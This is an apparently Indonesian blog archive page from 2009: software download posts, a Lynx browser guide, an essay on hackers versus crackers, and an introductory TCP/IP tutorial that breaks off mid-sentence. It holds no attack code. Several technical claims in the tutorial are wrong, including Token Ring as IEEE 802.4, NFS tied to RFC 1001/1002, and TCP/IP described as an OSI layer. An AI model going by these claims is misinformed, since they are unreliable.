Friday, July 31, 2009
Thursday, July 30, 2009
Skype lite
Tuesday, July 28, 2009
DOWNLOAD OPMOD 3.12 t8
Browsing Super Cepat dan Hemat Dengan Lynx
Buat para linuxer mungkin sudah tidak asing lagi dengan lynx, yaitu sebuah browser yang berbasis real text only.tapi buat pengguna windows juga bisa menggunakannya.
Lynx merupakan browser text yang sangat stabil, cepat, aman dan fleksibel. Dan konon lynx merupakan browser tercepat yang pernah ada, mengalahkan browser - browser terkenal seperti FireFox, Opera, dan IE
Lynx adalah browser dan teks standar yang mutlak harus dimiliki oleh seorang web designer maupun anda yang ingin punya pengalaman baru berbrowsing dengan cara unikunik,aneh,bahkan funny? Lynx membantu untuk memeriksa aksesibilitas situs Web mereka, dan walaupun sudah banyak alternatif browser yang berbasis text yang muncul,tetapi Lynx masih merupakan titik acuan.
bisa anda donlod disini
atau ke situsnya disini
cara menjalankanya:
- intuksi sortcut "GO TO" yakni perintah lynx yang akan membuka sebuah halaman web. Jadi setelah Anda menekan tombol "g" di keyboard, akan muncul tulisan URL to open, masukan saja website yang ingin Anda buka> (sebagai contoh buka http://www.google.com).
- Untuk memindahkan kursor dengan menggunakan panah ke atas dan ke bawah, panah arah kiri untk back ke halaman sebelumnya, berikut ini merupakan arti warna pada halaman lynx:Hijau = Hyper Link
Biru = Judul halaman
Brown-Green = Teks - Untuk kombinasi lengkap shortcut dari Lynx dapat Anda lihat disini
Monday, July 27, 2009
Mengganti nama pengguna di facebook
Cara merubahnya cukup mudah yaitu:
Silakan login ke Akun Facebook Anda.
Kemudian klik Pengaturan di kanan atas. Pilih Pengaturan Akun.
Akan ada menu Nama Pengguna.
Silahkan ganti nama pengguna sesuai keinginan Anda. Penggantiannya hanya bisa satu kali saja. Jadi harus dipikirkan baik-baik karena tidak bisa kembali ke nama sebelumnya.
Saya belum mengetes apakah alamat yang lama akan bisa diambil orang lain ataukah akan hilang. Sebenarnya saya tidak begitu ngefans dengan Facebook, seringnya hanya utak utik layanannya saja Jadi silahkan mencoba sendiri jika kurang puas dengan nama pengguna yang telah dipilih.
Semoga bermanfaat.
Sunday, July 26, 2009
Tools dan Cara Mempercepat Download Rapidshare
Jadi untuk yang belum mempunyai Premium Account di rapidshare, bisa menggunakan software ini. Karena dengan software ini kita bisa sedikit terbantu ketika download file-file yang ada pada layanan file hosting yang saya sebutkan di atas.
download :
USDownloader Vers 1.3.5.1 : via rapidshare disini
USDownloader Vers 1.3.5.1 via 4shared disini
Saturday, July 25, 2009
CC CLEANER 2.21.940
oke udah gak sabar,langsung aja download disini softwarenya enjoy...
DOWNLOADS SOFTWARE
udah gak sabar,langsung aja ke TKP
semoga bermanfaat..
Friday, July 24, 2009
Apa Itu Hacker
Istilah hacker timbul dari anggota budaya bersama suatu komunitas yang terdiri dari para programer mahir dan ahli jaringan, sejarahnya bermula dari dekade minikomputer pertama yang memiliki time-sharing dan zaman eksprimen awal ARPAnet. Hacker yang membangun internet, hacker yang membuat sistem operai Unix menjadi seperti sekarang, hacker yang mengoperasikan Usenet, hacker yang membuat Worl Wide Web berjalan. Anda bagian dari budaya ini? Jika anda menyumbangkan sesuatu untuk budaya ini, dan rekan lain di dalamnya mengenali Anda sebagai seorang hacker, maka seorang hackerlah Anda.
Hacker atau bukan?
Sekelompok orang menyebut dirinya seorang hacker padahal bukan, mereka mendapat kepuasan lewat membobol komputer,mengakali telepon,membobol password, tanpa memberikan solusi pengamanan. Mereka dikatakan cracker, orang yang tidak bertanggung jawab, malas dan tidak terlalu cerdas. Sayangnya, wartawan dan penulis telah salah kaprah dan menggunakan kata "hacker" untuk para cracker.
Banyak programer yang telah mendapat penghargaan "Hacker Terbaik", akan tetapi penghargaan ini diberikan hanya sebatas opini, yang pasti ahli-ahli yang berkencimpung dalam teknologi komputer seperti Edsger Dijkstra dan Donal Knuth, seperti halnya pembuat sofware terkenal seperti Linus Trovalds (Linux) dan Dennis Ritchie dan Ken Thompson (Bahasa pemrograman C), mereka termasuk dalam daftar.
Hacker vs Cracker
Jika Anda menjadi hacker, lanjutkan membaca. Jika ingin menjadi cracker bersiaplah menghabiskan 5 sampai 10 tahun di balik jeruji.
Sikap Hacker
Pekerjaan Hacker adalah menyelesaikan masalah dan membuat sesuatu yang berguna, dan hacker percaya pada kebebasan dan kerjasama. Terus belajar dan termotivasi, untuk menjadi seorang hacker Anda harus merasa tertarik untuk memecahkan persoalan, mengasah keahlian, dan melatih kecerdasan. Kembangkan keyakinan pada kapasitas belajar miskipun yang Anda ketahui belum cukup untuk memecahkan suatu persoalan, jika satu potong saja dari persoalan sudah terpecahkan, maka itu sudah cukup memberi pelajaran kepada Anda untuk menyelesaikan potongan berikutnya dan berikutnya, hingga semua potongan terselesaikan.
Otak yang kereatif merupakan sumber daya yang berharga dan terbatas, tak seharusnya sumberdaya ini diboroskan hanya untuk memikirkan kembali persoalan dari dasar, padahal ada begitu banyak permasalahan menarik baru lain yang menanti. Hacker tidak seharusnya dibosankan dengan pekerjaan bodoh yang berulang-ulang, karena ini berarti melakukan pekerjaan yang hanya bisa dilakukan, pemborosan sumber daya ini merugikan semua pihak, karena kebosanan dan pekerjaan yang membosankan bukan saja tidak menyenangkan tapi juga jahat.
Hacker anti otoriter, Siapa pun yang dapat memerintah Anda akan dapat menghentikan Anda untuk menyelesaikan pekerjaan yang menarik. Sikap otoriter harus dilawan dimanapun Anda berada agar nantinya tidak menekan Anda dan hacker lainya.
Disamping sikap diatas dibutuhkan juga kecerdasan, latihan, dedikasi, dan kerja keras. Kemampuan dalam bidang yang sulit yang melibatkan ketajaman mental, keahlian serta konsentrasi dan hanya dapat dikuasi oleh sedikit orang adalah baik.
Kemampuan Dasar Hacking
1. Pelajari Bahasa Pemrograman
Menguasai hanya satu bahasa pemrograman saja tidak akan mencapai tingkat kemampuan hacker atau bahkan seorang programer, perlu belajar cara pemrograman secara umum, tidak bergantung pada satu bahasa mana pun. Anda perlu mencapai tahap dimana dapat mempelajari bahasa baru dalam beberapa hari, dengan menghubungkan apa yang ada di manual dengan apa yang telah Anda ketahui. Perlu memplajari beberapa bahasa yang jauh berbeda dengan satu dengan yang lainya. Bahasa-bahasa terpenting dalam hacking adalah Pyton, C, Perl, dan LISP tapi paling baik sebetulnya mempelajari semuanya karena masing-masing mewakili cara pendekatan pemrograman yang berbeda dan tiap bahasa akan memberi pelajaran-pelajaran berharga.
2. Kuasi Sistem Operasi
Pelajari Sistem Operasi, terutama Linux dan Unix BSD karena sistem operasi tersebut paling banyak digunakan di internet dan berperan penting dalam perkembangan internet. Lagi pula Linux adalah sistem operasi Open Source. Pelajari Unix jalankan Unix, bermain-mainlah dengan Unix, berhubungan internet melalui Unix, baca kodenya dan modifikasi. Di Unix Anda akan menjumpai tool pemrograman yang lebih baik (termasuk C, Lisp, Pyton, dan Perl). Anda akan bersenang-senang dan mendapatkan pengetahuan lebih dari yang Anda sadari.
3. Pelajari Worl Wide Web
Maksudnya lebih dari sekedar menggunakan browser, tetapi mempelajari cara menulis HTML, bahasa markup Web.
4. Pelajari Jaringan Komputer
Jaringan komputer yang menghubungkan kita dengan orang lain di internet, sehingga perlu memplejari Jaringan komputer.
Semakin banyak dari hal-hal diatas yang sudah Anda kerjakan, semakin besar kemungkinan Anda adalah calon hacker berbakat.
Sertifikasi
Bukan hanya lembaga atau produk yang harus mempunyai sertifikasi, hacker juga mempunyai sertifikasi. Ada beberapa sertifikasi untuk hacker :
1. Certified Ethical Hacker
2. CREST
3. EC-Councel Certified Securty Analyst
4. Licensed Penetration Tester
5. ISSAF Penetration Testing Qualified
6. ISSAF Penetration Testing Expert
7. Certified Penetration Testing Professional
8. Certified Penetration Testing Expert
9. NSA's INFOSEC Assessment Methodology
10. NSA's INFOSE
BELAJAR HACKING : Konsep Dasar TCP/IP
kemungkinan kita tidak dapat melakah maju di dunia pehackingan. Dengan
kata lain, TCP/IP merupakan awal dari segalanya. Banyak orang yg
menyepelekan pentingnya mempelajari TCP/IP, mereka mengaku dirinya
"hacker" tetapi tidak mengerti sama sekali apa itu TCP/IP. Merasa hacker
hanya apabila bisa mencrash ataupun menjebol server, tetapi sebetulnya
bukan itulah maksud dari segala itu. Hacker itu adalah orang yg haus
akan pengetahuan, bukan haus akan penghancuran. Untuk menjadi hacker
dibutuhkan kerja keras, semangat, motivasi yg tinggi serta pemahaman
seluk-beluk internet itu sendiri, tanpa hal-hal tersebut mustahil anda
dapat menjadi seorang hacker yang tangguh.
Tulisan ini didedikasikan terutama untuk member Kecoak Elektronik dan
siapa saja yang ingin mempelajari TCP/IP, bukan untuk mereka yang hanya
ingin mencari jalan pintas menjadi hacker sejati. Bagi anda yg memang
udah profhacking mungkin tulisan ini tidak penting, karena memang
tulisan ini hanyalah pengantar belaka dan bukan merupakan referensi yg
sempurna (dan jauh dari sempurna) oleh karenanya hanya dikhususkan bagi
mereka yg pendatang baru (newbies).
1. Apa itu TCP/IP ?
-------------------
TCP/IP adalah salah satu jenis protokol* yg memungkinkan kumpulan
komputer untuk berkomunikasi dan bertukar data didalam suatu network
(jaringan).
************************************************************************
Merupakan himpunan aturan yg memungkinkan komputer untuk berhubungan
antara satu dengan yg lain, biasanya berupa bentuk / waktu / barisan /
pemeriksaan error saat transmisi data.
***********************************************************************
2. Apa yg membuat TCP/IP menjadi penting ?
------------------------------------------
Karena TCP/IP merupakan protokol yg telah diterapkan pada hampir semua
perangkat keras dan sistem operasi. Tidak ada rangkaian protokol lain yg
tersedia pada semua sistem berikut ini :
a. Novel Netware.
b. Mainframe IBM.
c. Sistem digital VMS.
d. Server Microsoft Windows NT
e. Workstation UNIX, LinuX, FreeBSD
f. Personal komputer DOS.
3. Bagaimana awalnya keberadaan TCP/IP ?
----------------------------------------
Konsep TCP/IP berawal dari kebutuhan DoD (Departement of Defense) AS
akan suatu komunikasi di antara berbagai variasi komputer yg telah ada.
Komputer-komputer DoD ini seringkali harus berhubungan antara satu
organisasi peneliti dg organisasi peneliti lainnya, dan harus tetap
berhubungan sehingga pertahanan negara tetap berjalan selama terjadi
bencana, seperti ledakan nuklir. Oleh karenanya pada tahun 1969
dimulailah penelitian terhadap serangkaian protokol TCP/IP. Di antara
tujuan-tujuan penelitian ini adalah sebagai berikut :
1. Terciptanya protokol-protokol umum, DoD memerlukan suatu protokol yg
dapat ditentukan untuk semua jaringan.
2. Meningkatkan efisiensi komunikasi data.
3. Dapat dipadukan dengan teknologi WAN (Wide Area Network) yg telah
ada.
4. Mudah dikonfigurasikan.
Tahun 1968 DoD ARPAnet (Advanced Reseach Project Agency) memulai
penelitian yg kemudian menjadi cikal bakal packet switching . Packet
switching inilah yg memungkinkan komunikasi antara lapisan network
(dibahas nanti) dimana data dijalankan dan disalurkan melalui jaringan
dalam bentuk unit-unit kecil yg disebut packet*. Tiap-tiap packet ini
membawa informasi alamatnya masing-masing yg ditangani dengan khusus
oleh jaringan tersebut dan tidak tergantung dengan paket-paket lain.
Jaringan yg dikembangkan ini, yg menggunakan ARPAnet sebagai tulang
punggungnya, menjadi terkenal sebagai internet.
Protokol-protokol TCP/IP dikembangkan lebih lanjut pada awal 1980 dan
menjadi protokol-protokol standar untuk ARPAnet pada tahun 1983.
Protokol-protokol ini mengalami peningkatan popularitas di komunitas
pemakai ketika TCP/IP digabungkan menjadi versi 4.2 dari BSD (Berkeley
Standard Distribution) UNIX. Versi ini digunakan secara luas pada
institusi penelitian dan pendidikan dan digunakan sebagai dasar dari
beberapa penerapan UNIX komersial, termasuk SunOS dari Sun dan Ultrix
dari Digital. Karena BSD UNIX mendirikan hubungan antara TCP/IP dan
sistem operasi UNIX, banyak implementasi UNIX sekarang menggabungkan
TCP/IP.
************************************************************************
unit informasi yg mana jaringan berkomunikasi. Tiap-tiap paket berisi
identitas (header) station pengirim dan penerima, informasi error-
control, permintaan suatu layanan dalam lapisan network, informasi
bagaimana menangani permintaan dan sembarang data penting yg harus
ditransfer.
************************************************************************
4. Layanan apa saja yg diberikan oleh TCP/IP ?
----------------------------------------------
Berikut ini adalah layanan "tradisional" yg dilakukan TCP/IP :
a. Pengiriman file (file transfer). File Transfer Protokol (FTP)
memungkinkan pengguna komputer yg satu untuk dapat mengirim ataupun
menerima file ke komputer jaringan. Karena masalah keamanan data,
maka FTP seringkali memerlukan nama pengguna (user name) dan
password, meskipun banyak juga FTP yg dapat diakses melalui
anonymous, alias tidak berpassword. (lihat RFC 959 untuk spesifikasi
FTP)
b. Remote login. Network terminal Protokol (telnet) memungkinkan
pengguna komputer dapat melakukan log in ke dalam suatu komputer
didalam suatu jaringan. Jadi hal ini berarti bahwa pengguna
menggunakan komputernya sebagai perpanjangan tangan dari komputer
jaringan tersebut.( lihat RFC 854 dan 855 untuk spesifikasi telnet
lebih lanjut)
c. Computer mail. Digunakan untuk menerapkan sistem elektronik mail.
(lihat RFC 821 dan 822)
d. Network File System (NFS). Pelayanan akses file-file jarak jauh yg
memungkinkan klien-klien untuk mengakses file-file pada komputer
jaringan jarak jauh walaupun file tersebut disimpan secara lokal.
(lihat RFC 1001 dan 1002 untuk keterangan lebih lanjut)
e. remote execution. Memungkinkan pengguna komputer untuk menjalankan
suatu program didalam komputer yg berbeda. Biasanya berguna jika
pengguna menggunakan komputer yg terbatas, sedangkan ia memerlukan
sumber yg banyak dalam suatu system komputer. Ada beberapa jenis
remote execution, ada yg berupa perintah-perintah dasar saja, yaitu
yg dapat dijalankan dalam system komputer yg sama dan ada pula yg
menggunakan "prosedure remote call system", yg memungkinkan program
untuk memanggil subroutine yg akan dijalankan di system komputer yg
berbeda. (sebagai contoh dalam Berkeley UNIX ada perintah "rsh" dan
"rexec")
f. name servers. Nama database alamat yg digunakan pada internet (lihat
RFC 822 dan 823 yg menjelaskan mengenai penggunaan protokol name
server yg bertujuan untuk menentukan nama host di internet.)
************************************************************************
RFC (Request For Comments) adalah merupakan standar yg digunakan dalam
internet, meskipun ada juga isinya yg merupakan bahan diskusi ataupun
omong kosong belaka. Diterbitkan oleh IAB (Internet Activities Board)
yg merupakan komite independen para peneliti dan profesional yg
mengerti teknis, kondisi dan evolusi sistem internet. Sebuah surat yg
mengikuti nomor RFC menunjukan status RFC :
S: standard, standar resmi bagi internet
DS: Draft standard, protokol tahap akhir sebelum disetujui sebagai
standar
PS: Proposed Standard, protokol pertimbangan untuk standar masa depan
I: Informational, berisikan bahan-bahan diskusi yg sifatnya informasi
E: Experimental, protokol dalam tahap percobaan tetapi bukan pada jalur
standar.
H: Historic, protokol-protokol yg telah digantikan atau tidak lagi
dipertimbankan utk standarisasi.
************************************************************************
5. Bagaimanakah bentuk arsitektur dari TCP/IP itu ?
---------------------------------------------------
Dikarenakan TCP/IP adalah serangkaian protokol di mana setiap protokol
melakukan sebagian dari keseluruhan tugas komunikasi jaringan, maka
tentulah implementasinya tak lepas dari arsitektur jaringan itu sendiri.
Arsitektur rangkaian protokol TCP/IP mendifinisikan berbagai cara agar
TCP/IP dapat saling menyesuaikan.
Karena TCP/IP merupakan salah satu lapisan protokol OSI * (Open System
Interconnections), berarti bahwa hierarki TCP/IP merujuk kepada 7
lapisan OSI tersebut. Berikut adalah model referensi OSI 7 lapisan, yg
mana setiap lapisan menyediakan tipe khusus pelayanan jaringan :
Peer process
|Application layer |<----------------->|Application layer |
|Presentation layer|<----------------->|Presentation layer|
|Session layer |<----------------->|Session layer |
|Transport layer |<----------------->|Transport layer |
|Network layer |<----------------->|Network layer |
|Data link layer |<----------------->|Data link layer |
|Physical layer |<----------------->|Physical layer |
Tiga lapisan teratas biasa dikenal sebagai "upper lever protocol"
sedangkan empat lapisan terbawah dikenal sebagai "lower level protocol".
Tiap lapisan berdiri sendiri tetapi fungsi dari masing-masing lapisan
bergantung dari keberhasilan operasi layer sebelumnya. Sebuah lapisan
pengirim hanya perlu berhubungan dengan lapisan yang sama di penerima
(jadi misalnya lapisan data link penerima hanya berhubungan dengan data
link pengirim) selain dengan satu layer di atas atau dibawahnya
(misalnya lapisan network berhubungan dengan lapisan transport
diatasnya atau dengan lapisan data link dibawahnya).
Model dengan menggunakan lapisan ini merupakan sebuah konsep yg penting
karena suatu fungsi yg rumit yg berkaitan dengan komunikasi dapat
dipecahkan menjadi sejumlah unit yg lebih kecil. Tiap lapisan bertugas
memberikan layanan tertentu pada lapisan diatasnya dan juga melindungi
lapisan diatasnya dari rincian cara pemberian layanan tersebut. Tiap
lapisan harus transparan sehingga modifikasi yg dilakukan atasnya tidak
akan menyebabkan perubahan pada lapisan yang lain. Lapisan menjalankan
perannya dalam pengalihan data dengan mengikuti peraturan yang berlaku
untuknya dan hanya berkomunikasi dengan lapisan yang setingkat.
Akibatnya sebuah layer pada satu sistem tertentu hanya akan berhubungan
dengan lapisan yang sama dari sistem yang lain. Proses ini dikenal
sebagai "Peer process". Dalam keadaan sebenarnya tidak ada data yang
langsung dialihkan antar lapisan yang sama dari dua sistem yang berbeda
ini. Lapisan atas akan memberikan data dan kendali ke lapisan dibawahnya
sampai lapisan yang terendah dicapai. Antara dua lapisan yang berdekatan
terdapat "interface" (antarmuka). Interface ini mendifinisikan operasi
dan layanan yang diberikan olehnya ke lapisan lebih atas. Tiap lapisan
harus melaksanakan sekumpulan fungsi khusus yang dipahami dengan
sempurna. Himpunan lapisan dan protokol dikenal sebagai "arsitektur
jaringan".
Pengendalian komunikasi dalam bentuk lapisan menambah overhead karena
tiap lapisan berkomunikasi dengan lawannya melalui "header". Walaupun
rumit tetapi fungsi tiap lapisan dapat dibuat dalam bentuk modul
sehingga kerumitan dapat ditanggulangi dengan mudah.
Disini kita tidak akan membahas model OSI secara mendalam secara
keseluruhannya, karena protokol TCP/IP tidak mengikuti benar model
referensi OSI tersebut. Walaupun demikian, TCP/IP model akan terlihat
seperti ini :
=========================================
|Application layer | |
|Presentation layer | Application layer |
|Session layer | |
|===================|===================|
|Transport layer | Transport layer/ |
| | Host to host |
|=======================================|
|Network layer | Network layer/ |
| | internet layer |
|===================|===================|
|Data Link layer | Network access |
|Physical layer | |
|===================|===================|
Model OSI model internet
Sekarang mari kita bahas keempat lapisan tersebut.
a. Network Access
Lapisan ini hanya menggambarkan bagaimana data dikodekan menjadi sinyal-
sinyal dan karakteristik antarmuka tambahan media.
b. Internet layer/ network layer
Untuk mengirimkan pesan pada suatu internetwork (suatu jaringan yang
mengandung beberapa segmen jaringan), tiap jaringan harus secara unik
diidentifikasi oleh alamat jaringan. Ketika jaringan menerima suatu
pesan dari lapisan yang lebih atas, lapisan network akan menambahkan
header pada pesan yang termasuk alamat asal dan tujuan jaringan.
Kombinasi dari data dan lapisan network disebut "paket". Informasi
alamat jaringan digunakan untuk mengirimkan pesan ke jaringan yang
benar, setelah pesan tersebut sampai pada jaringan yg benar, lapisan
data link dapat menggunakan alamat node untuk mengirimkan pesan ke node
tertentu.
_____ _____
|=====| |=====| ################### end nodes
\-----/ \-----/ # #
|===| |===| # #
| | # #
---|---------- |---- # routers # #
| # # # #
| # # # #
|=---=| # # # #
|=---=| # # #
| # _____ _____
komputer ******* # |=====| |=====|
Lainnya --- * token * -----|=---=| \-----/ \-----/
* ring * |=---=| |===| |===|
******* | | |
| -|-------- |---------|---------
-----
|
Komputer
Lainnya
meneruskan paket ke jaringan yang benar disebut "routing" dan peralatan
yang meneruskan paket adalah "routers". Suatu antar jaringan mempunyai
dua tipe node :
- "End nodes", menyediakan pelayanan kepada pemakai. End nodes
menggunakan lapisan network utk menambah informasi alamat jaringan
kepada paket, tetapi tidak melakukan routing. End nodes kadang-kadang
disebut "end system" (istilah OSI) atau "host" (istilah TCP/IP)
- Router memasukan mekanisme khusus untuk melakukan routing. Karena
routing merupakan tugas yg kompleks, router biasanya merupakan peralatan
tersendiri yg tidak menyediakan pelayanan kepada pengguna akhir. Router
kadang-kadang disebut "intermediate system" (istilah OSI) atau "gateway"
(istilah TCP/IP).
Selain itu juga lapisan ini bertanggung jawab untuk pengiriman data
melalui antar jaringan. Protokol lapisan intenet yang utama adalah
internet protokol, IP (RFC 791, lihat juga RFC 919, 922,950).
IP menggunakan protokol-protokol lain untuk tugas-tugas khusus internet.
ICMP(dibahas nanti) digunakan untuk mengirimkan pesan-pesan ke lapisan
host ke host. Adapun fungsi IP :
1. Pengalamatan
2. Fragmentasi datagram pada antar jaringan
3. Pengiriman datagram pada antar jaringan
c. Transport layer /host to host
Salah satu tanggung jawab lapisan transport adalah membagi pesan-pesan
menjadi fragment-fragment yang cocok dengan pembatasan ukuran yg
dibentuk oleh jaringan. Pada sisi penerima, lapisan transport
menggabungkan kembali fragment untuk mengembalikan pesan aslinya,
sehingga dapat diketahui bahwa lapisan transport memerlukan proses
khusus pada satu komputer ke proses yg bersesuaian pada komputer tujuan.
Hal ini dikenal sebagai Service Access Point (SAP) ID kepada setiap
paket (berlaku pada model OSI, istilah TCP/IP untuk SAP ini disebut port
*).
Mengenali pesan-pesan dari beberapa proses sedemikian rupa sehingga
pesan tersebut dikirimkan melalui media jaringan yg sama disebut
multiplexing. Prosedur mengembalikan pesan dan mengarahkannya pada
proses yg benar disebut demultiplexing.
Tanggung javab lapisan transport yg paling berat dalam hal pengiriman
pesan adalah mendeteksi kesalahan dalam pengiriman data tersebut. Ada
dua kategori umum deteksi kesalahan dapat dilakukan oleh lapisan
transport :
a. Reliable delivery, berarti kesalahan tidak dapat terjadi, tetapi
kesalahan akan dideteksi jika terjadi. Pemulihan kesalahan dilakukan
dengan jalan memberitahukan lapisan atas bahwa kesalahan telah
terjadi dan meminta pengirimna kembali paket yg kesalahannya
terdeteksi.
b. Unreliable delivery, bukan berarti kesalahan mungkin terjadi, tetapi
menunjukkan bahwa lapisan transport tidak memeriksa kesalahan
tersebut. Karena pemeriksaan kesalahan memerlukan waktu dan
mengurangi penampilan jaringan. Biasanya kategori ini digunakan jika
setiap paket mengandung pesan yg lengkap, sedangkan reliable
delivery, jika mengandung banyak paket. Unreliable delivery, sering
disebut datagram delivery dan paket-paket bebas yg dikerimkan
dengan cara ini sering disebut datagram.
Karena proses lapisan atas (application layer) memiliki kebutuhan yg
bervariasi, terdapat dua protokol lapisan transport /host to host, TCP
dan UDP. TCP adalah protokol yg handal. Protokol ini berusaha secara
seksama untuk mengirimkan data ke tujuan, memeriksa kesalahan,
mengirimkan data ulang bila diperlukan dan mengirimkan error ke lapisan
ats hanya bila TCP tidak berhasil mengadakan komunikasi (dibahas nanti).
Tetapi perlu dicatat bahwa kehandalan TCP tercapai dengan mengorbankan
bandwidth jaringan yg besar.
UDP (User Datagram Protocol) disisi lain adalah protokol yg tidak
handal. Protokol ini hanya semampunya saja mengirimkan data. UDP tidak
akan berusaha untuk mengembalikan datagram yg hilang dan proses pada
lapisan atas harus bertanggung jawab untuk mendeteksi data yg hilang
atau rusak dan mengirimkan ulang data tersebut bila dibutuhkan.
c. Application layer
Lapisan inilah biasa disebut lapisan akhir (front end) atau bisa disebut
user program. Lapisan inilah yg menjadi alasan keberadaan lapisan
sebelumnya. Lapisan sebelumnya hanya bertugas mengirimkan pesan yg
ditujukan utk lapisan ini. Di lapisan ini dapat ditemukan program yg
menyediakan pelayanan jaringan, seperti mail server (email program),
file transfer server (FTP program), remote terminal.
************************************************************************
Token Ring merupakan teknologi LAN data link yg didefinisikan oleh IEEE
802.4 dimana sistem dihubungkan satu sama lain dengan menggunakan
segmen kabel twisted-pair point-to-point untuk membentuk suatu struktur
ring. Sebuah sistem diijinkan untuk mengirim hanya bila sistem tersebut
memiliki token (data unit khsusus yg digunakan bersama-sama) yg akan
dilewarkan dari satu sistem ke sistem lain sekitar ring.
========================================================================
komputer port adalah tempat adalah tempat dimana informasi masuk dan
keluar. Di PC contohnya monitor sebagai keluaran informasi, keyboard dan
mouse sebagai masukan informasi. Tetapi dalam istilah internet, port
berbentuk virtual (software) bukan berbentuk fisik seperti RS232 serial
port (utk koneksi modem).
************************************************************************
6. Bagaimana TCP dan IP bekerja ?
---------------------------------
Seperti yg telah dikemukakan diatas TCP/IP hanyalah merupakan suatu
lapisan protokol(penghubung) antara satu komputer dg yg lainnya dalam
network, meskipun ke dua komputer tersebut memiliki OS yg berbeda. Untuk
mengerti lebih jauh marilah kita tinjau pengiriman sebuah email.
Dalam pengiriman email ada beberapa prinsip dasar yg harus dilakukan.
Pertama, mencakup hal-hal umum berupa siapa yg mengirim email, siapa yg
menerima email tersebut serta isi dari email tersebut. Kedua, bagaimana
cara agar email tersebut sampai pada tujuannya.Dari konsep ini kita
dapat mengetahui bahwa pengirim email memerlukan "perantara" yg
memungkinkan emailnya sampai ke tujuan (seperti layaknya pak pos). Dan
ini adalah tugas dari TCP/IP. Antara TCP dan IP ada pembagian tugas
masing-masing.
TCP merupakan connection-oriented, yg berarti bahwa kedua komputer yg
ikut serta dalam pertukaran data harus melakukan hubungan terlebih dulu
sebelum pertukaran data ( dalam hal ini email) berlangsung. Selain itu
TCP juga bertanggung jawab untuk menyakinkan bahwa email tersebut sampai
ke tujuan, memeriksa kesalahan dan mengirimkan error ke lapisan atas
hanya bila TCP tidak berhasil melakukan hubungan (hal inilah yg membuat
TCP sukar untuk dikelabuhi). Jika isi email tersebut terlalu besar
untuk satu datagram * , TCP akan membaginya kedalam beberapa datagram.
IP bertanggung jawab setelah hubungan berlangsung, tugasnya adalah untuk
meroute data packet . didalam network. IP hanya bertugas sebagai kurir
dari TCP dalam penyampaian datagram dan "tidak bertanggung jawab" jika
data tersebut tidak sampai dengan utuh (hal ini disebabkan IP tidak
memiliki informasi mengenai isi data yg dikirimkan) maka IP akan
mengirimkan pesan kesalahan ICMP*. Jika hal ini terjadi maka IP hanya
akan memberikan pesan kesalahan (error message) kembali ke sumber data.
Karena IP "hanya" mengirimkan data "tanpa" mengetahui mana data yg akan
disusun berikutnya menyebabkan IP mudah untuk dimodifikasi daerah
"sumber dan tujuan" datagram. Hal inilah penyebab banyak paket hilang
sebelum sampai kembali ke sumber awalnya. (jelas ! sumber dan tujuannya
sudah dimodifikasi)
Kalimat Datagram dan paket sering dipertukarkan penggunaanya. Secara
teknis, datagram adalah kalimat yg digunakan jika kita hendak
menggambarkan TCP/IP. Datagram adalah unit dari data, yg tercakup dalam
protokol.
************************************************************************
ICPM adalah kependekan dari Internet Control Message Protocol yg
bertugas memberikan pesan dalam IP. Berikut adalah beberapa pesan
potensial sering timbul (lengkapnya lihat RFC 792):
a. Destination unreachable, terjadi jika host,jaringan,port atau protokol
tertentu tidak dapat dijangkau.
b. Time exceded, dimana datagram tidak bisa dikirim karena time to live
habis.
c. Parameter problem, terjadi kesalahan parameter dan letak oktert dimana
kesalahan terdeteksi.
d. Source quench, terjadi karena router/host tujuan membuang datagram
karena batasan ruang buffer atau karena datagram tidak dapat diproses.
e. Redirect, pesan ini memberi saran kepada host asal datagram mengenai
router yang lebih tepat untuk menerima datagram tsb.
f. Echo request dan echo reply message, pesan ini saling mempertukarkan
data antara host.
Selain RFC 792 ada juga RFC 1256 yg isinya berupa ICMP router discovery
message dan merupakan perluasan dari ICMP, terutama membahas mengenai
kemampuan bagi host untuk menempatkan rute ke gateway.
************************************************************************
7. Bagaimanakah bentuk format header protokol UDP,TCP,IP ?
----------------------------------------------------------
1. UDP
------
UDP memberikan alternatif transport untuk proses yg tidak membutuhkan
pengiriman yg handal. Seperti yg telah dibahas sebelumnya, UDP merupakan
protokol yg tidak handal, karena tidak menjamin pengiriman data atau
perlindungan duplikasi. UDP tidak mengurus masalah penerimaan aliran
data dan pembuatan segmen yg sesuai untuk IP.Akibatnya, UDP adalah
protokol sederhana yg berjalan dengan kemampuan jauh dibawah TCP. Header
UDP tidak mengandung banyak informasi, berikut bentuk headernya :
++++++++++++++++++++++++++++++++++++++
+ Source Port + Destination Port +
++++++++++++++++++++++++++++++++++++++
+ Length + Checksum +
++++++++++++++++++++++++++++++++++++++
source port, adalah port asal dimana system mengirimkan datagram.
Destination port, adalah port tujuan pada host penerima.
Length, berisikan panjang datagram dan termasuk data.
Checksum, bersifat optional yg berfungsi utk meyakinkan bahwa data tidak
akan mengalami rusak (korup)
2. TCP
------
Seperti yg telah dibahas sebelumnya, TCP merupakan protokol yg handal
dan bertanggung jawab untuk mengirimkan aliran data ke tujuannya secara
handal dan berurutan. Untuk memastikan diterimanya data, TCP menggunakan
nomor urutan segmen dan acknowlegement (jawaban). Misalkan anda ingin
mengirim file berbentuk seperti berikut :
----------------------------------------------------------
TCP kemudian akan memecah pesan itu menjadi beberapa datagram (untuk
melakukan hal ini, TCP tidak mengetahui berapa besar datagram yg bisa
ditampung jaringan. Biasanya, TCP akan memberitahukan besarnya datagram
yg bisa dibuat, kemudian mengambil nilai yg terkecil darinya, untuk
memudahkan).
---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
TCP kemudian akan meletakan header di depan setiap datagram tersebut.
Header ini biasanya terdiri dari 20 oktet, tetapi yg terpenting adalah
oktet ini berisikan sumber dan tujuan nomor port (port number) dan
nomor urut (sequence number). Nomor port digunakan untuk menjaga data
dari banyaknya data yg lalu lalang. Misalkan ada 3 orang yg mengirim
file. TCP anda akan mengalokasikan nomor port 1000, 1001, dan 1002 untuk
transfer file. Ketika datagram dikirim, nomor port ini menjadi sumber
port (source port) number untuk masing-masing jenis transfer.
Yg perlu diperhatikan yaitu bahwa TCP perlu mengetahui juga port yg
dapat digunakan oleh tujuan (dilakukan diawal hubungan). Port ini
diletakan pada daerah tujuan port (destination port). Tentu saja jika
ada datagram yg kembali, maka source dan destination portnya akan
terbalik, dan sejak itu port anda menjadi destination port dan port
tujuan menjadi source port.
Setiap datagram mempunyai nomor urut (sequence number) masing-masing yg
berguna agar datagram tersebut dapat tersusun pada urutan yg benar dan
agar tidak ada datagram yg hilang. TCP tidak memberi nomor datagram,
tetapi pada oktetnya. Jadi jika ada 500 oktet data dalam setiap
